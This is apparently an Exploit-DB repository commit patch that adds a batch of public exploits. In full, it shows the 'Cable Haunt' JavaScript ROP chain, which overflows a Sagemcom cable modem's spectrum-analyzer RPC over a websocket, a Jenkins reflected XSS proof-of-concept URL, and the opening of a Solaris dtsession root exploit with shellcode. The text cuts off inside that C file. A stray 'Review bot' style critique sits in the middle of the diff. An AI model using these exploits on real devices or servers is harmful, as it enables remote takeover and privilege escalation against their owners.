From 1a9ce31a5f0bd8a9a5cbe527dcbe548c307ad054 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 17 Jan 2020 05:02:10 +0000 Subject: [PATCH] DB: 2020-01-17 12 changes to exploits/shellcodes SunOS 5.10 Generic_147148-26 - Local Privilege Escalation Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP) Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting VICIDIAL Call Center Suite - Multiple SQL Injections Online Book Store 1.0 - 'bookisbn' SQL Injection WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting Online Book Store 1.0 - Arbitrary File Upload Tautulli 2.1.9 - Denial of Service ( Metasploit ) Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection --- exploits/hardware/remote/47936.js | 431 +++++++++++++++ exploits/java/webapps/47927.txt | 9 + exploits/multiple/local/47932.c | 291 ++++++++++ exploits/multiple/webapps/47929.rb | 38 ++ exploits/multiple/webapps/47930.txt | 130 +++++ exploits/php/webapps/47925.txt | 85 +++ exploits/php/webapps/47926.txt | 45 ++ exploits/php/webapps/47928.txt | 22 + exploits/php/webapps/47931.txt | 48 ++ exploits/php/webapps/47934.txt | 57 ++ exploits/windows/local/47933.rb | 23 + exploits/windows_x86-64/local/47935.cpp | 707 ++++++++++++++++++++++++ files_exploits.csv | 22 +- 13 files changed, 1903 insertions(+), 5 deletions(-) create mode 100644 
exploits/hardware/remote/47936.js create mode 100644 exploits/java/webapps/47927.txt create mode 100644 exploits/multiple/local/47932.c create mode 100755 exploits/multiple/webapps/47929.rb create mode 100644 exploits/multiple/webapps/47930.txt create mode 100644 exploits/php/webapps/47925.txt create mode 100644 exploits/php/webapps/47926.txt create mode 100644 exploits/php/webapps/47928.txt create mode 100644 exploits/php/webapps/47931.txt create mode 100644 exploits/php/webapps/47934.txt create mode 100755 exploits/windows/local/47933.rb create mode 100644 exploits/windows_x86-64/local/47935.cpp
diff --git a/exploits/hardware/remote/47936.js b/exploits/hardware/remote/47936.js
new file mode 100644
index 000000000..19621f8ef
--- /dev/null
+++ b/exploits/hardware/remote/47936.js
@@ -0,0 +1,431 @@ +// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip + +function buf2hex(buffer) { // buffer is an ArrayBuffer + return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join(''); +} + +function insertAt(arr, index, toInsert) { + for(let i = 0; i < toInsert.length; i++) { + arr[i+index]= toInsert[i]; + } +} + +function testEqual(buf1, buf2) +{ + if (buf1.byteLength != buf2.byteLength) return false; + var dv1 = new Int8Array(buf1); + var dv2 = new Int8Array(buf2); + for (var i = 0 ; i != buf1.byteLength ; i++) + { + if (dv1[i] != dv2[i]) return false; + } + return true; +} + +arr = new Uint8Array(0xd00); + +arr.fill(0x41) + +firstSp = 0x00 +previousSp = firstSp +sp = previousSp+0xa0 +insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) +// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) +//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) +//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c]) +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 
+insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call Socket + +//0x80a05b20 +socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; + +//0x80a05a30; +serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30]; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp + 0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c]) +//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68]) +//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8]) +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) +//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) +//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call memset + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +// previousSp = sp +// sp = previousSp+0x10 +// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, sp-1, socketAddr) +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; +//store port + +// previousSp = sp +// sp = previousSp+0x20 +// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c] + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) +//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp + 0x10 +insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c]) +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) +//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) +//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call bind + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw 
$s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) +//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 +insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call listen + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8]) +//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) +//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call accept + +//0x80a05b24 +clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr +insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) +//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; + + +// previousSp = sp +// sp = previousSp+0x20 +// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) +// //0x80787f64: jalr $s5; nop; + +clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20] + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) +//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) +//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38]) +//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +//0x80a05c30 +payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30] + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... 
lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) +//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68]) +//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) +//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; + +previousSp = sp +sp = previousSp+0x30 +insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call recv + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) +// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; + +previousSp = sp +sp = previousSp+0x20 +insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c]) +//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep +insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw 
$ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; +//call sleep + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, sp-1, payloadAddr) //set s0 = payload +insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) +//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; + +previousSp = sp +sp = previousSp+0x80 +insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) +//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +previousSp = sp +sp = previousSp+0x10 +insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) +//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; + +var string = new TextDecoder("utf-8").decode(arr); + +var newArr = new TextEncoder("utf-8").encode(string); + +console.log(buf2hex(newArr)); + +exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}' +console.log(exploit) + +console.log(testEqual(arr, newArr)); + +var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend') + +socket.onopen = function(e) { + socket.send(exploit) + fetch('/payload') +}; \ No newline at end of file diff --git a/exploits/java/webapps/47927.txt b/exploits/java/webapps/47927.txt new file mode 100644 index 000000000..5430836dd --- /dev/null +++ b/exploits/java/webapps/47927.txt 
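Review bot: 47936.js carries no EDB header block (title, author, vendor, version, CVE) even though the other files in this commit open with one, so a reader has to go back to the commit subject to learn that the file targets the Sagemcom F@ST 3890 (50_10_19-T1) cable modem; add the usual `// Exploit Title:` / `// Version:` / `// CVE:` lines as a leading comment. Style: `arr`, `firstSp`, `previousSp`, `sp`, `socketAddr`, `serverAddr`, `exploit` and the other top-level bindings are assigned without `const`/`let`, so they become implicit globals, while `buf2hex`/`testEqual` use `var` and `!=`; a `'use strict';` line plus `const`/`let` declarations and `!==` would turn a mistyped name into an error instead of a silent new global. In `socket.onopen` the `fetch('/payload')` promise is neither awaited nor given a `.catch()`, so a failed fetch surfaces only as an unhandled rejection; `fetch('/payload').catch((err) => console.error(err));` keeps the failure visible.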
@@ -0,0 +1,9 @@
+# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
+# Exploit Author: Ai Ho
+# Vendor Homepage : https://jenkins.io/
+# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
+# References: https://jenkins.io/security/advisory/2020-01-15/
+# CVE: CVE-2020-2096
+
+# PoC:
+http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E
\ No newline at end of file
diff --git a/exploits/multiple/local/47932.c b/exploits/multiple/local/47932.c
new file mode 100644
index 000000000..2714b3840
--- /dev/null
+++ b/exploits/multiple/local/47932.c
@@ -0,0 +1,291 @@ +# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation +# Date: 2020-01-15 +# Author: Marco Ivaldi +# Vendor: www.oracle.com +# Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html +# CVE: CVE-2020-2696 + +/* + * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel + * Copyright (c) 2019-2020 Marco Ivaldi + * + * A buffer overflow in the CheckMonitor() function in the Common Desktop + * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with + * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain + * root privileges via a long palette name passed to dtsession in a malicious + * .Xdefaults file (CVE-2020-2696). + * + * "I always loved Sun because it was so easy to own. Now with Solaris 11 I + * don't like it anymore." -- ~B. + * + * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack + * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory + * space, try returning to sprintf() instead of strcpy(). + * + * I haven't written a Solaris/SPARC version because I don't have a SPARC box + * on which Solaris 10 can run. If anybody is kind enough to give me access to + * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. + * + * Usage: + * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall + * [on your xserver: disable the access control] + * $ ./raptor_dtsession_ipa 192.168.1.1:0 + * [...] 
+ * # id + * uid=0(root) gid=1(other) + * # + * + * Tested on: + * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) + * [previous Solaris versions are also likely vulnerable] + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel" +#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi " + +#define VULN "/usr/dt/bin/dtsession" // the vulnerable program +#define BUFSIZE 256 // size of the palette name +#define PADDING 3 // padding in the palette name +#define PAYSIZE 1024 // size of the payload +#define OFFSET env_len / 2 // offset to the shellcode + +char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ +/* double setuid() */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +/* execve() */ +"\x31\xc0\x50\x68/ksh\x68/bin" +"\x89\xe3\x50\x53\x89\xe2\x50" +"\x52\x53\xb0\x3b\x50\xcd\x91"; + +/* globals */ +char *env[256]; +int env_pos = 0, env_len = 0; + +/* prototypes */ +int add_env(char *string); +void check_zero(int addr, char *pattern); +int search_ldso(char *sym); +int search_rwx_mem(void); +void set_val(char *buf, int pos, int val); + +/* + * main() + */ +int main(int argc, char **argv) +{ + char buf[BUFSIZE], 